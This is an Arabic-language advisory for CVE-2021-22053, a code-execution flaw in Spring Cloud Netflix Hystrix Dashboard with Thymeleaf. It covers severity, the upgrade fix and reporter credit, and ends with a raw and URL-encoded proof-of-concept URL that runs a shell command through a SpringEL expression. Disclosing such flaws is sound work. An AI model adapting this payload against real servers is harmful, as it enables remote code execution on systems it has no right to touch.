
Spring Cloud Netflix Hystrix Dashboard ثغرة حل القالب CVE-2021-22053
عالية
Spring من VMware
التطبيقات التي تستخدم كلاً من spring-cloud-netflix-hystrix-dashboard و spring-boot-starter-thymeleaf تتيح طريقة لتنفيذ كود يتم إرساله داخل مسار URI أثناء حل قوالب العرض. عندما يتم إرسال طلب إلى /hystrix/monitor;[بيانات مقدمة من المستخدم]، يتم تقييم عناصر المسار التالية لـ hystrix/monitor كتعبيرات SpringEL، مما قد يؤدي إلى تنفيذ كود.
الشدة عالية ما لم يُذكر خلاف ذلك.
يجب على مستخدمي الإصدارات المتأثرة تطبيق التخفيف التالي: يجب ترقية المستخدمين إلى 2.2.10.RELEASE+. لا توجد خطوات أخرى ضرورية. الإصدارات التي أصلحت هذه المشكلة تشمل:
تم تحديد هذه الثغرة والإبلاغ عنها بمسؤولية بواسطة threedr3am من مختبر SecCoder Security ([email protected]).
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
2021-11-17: نشر التقرير الأولي للثغرة.
الخام:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
المشفر:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
ملاحظة: لا يمكن تضمين الشرطة المائلة '/' في الأمر.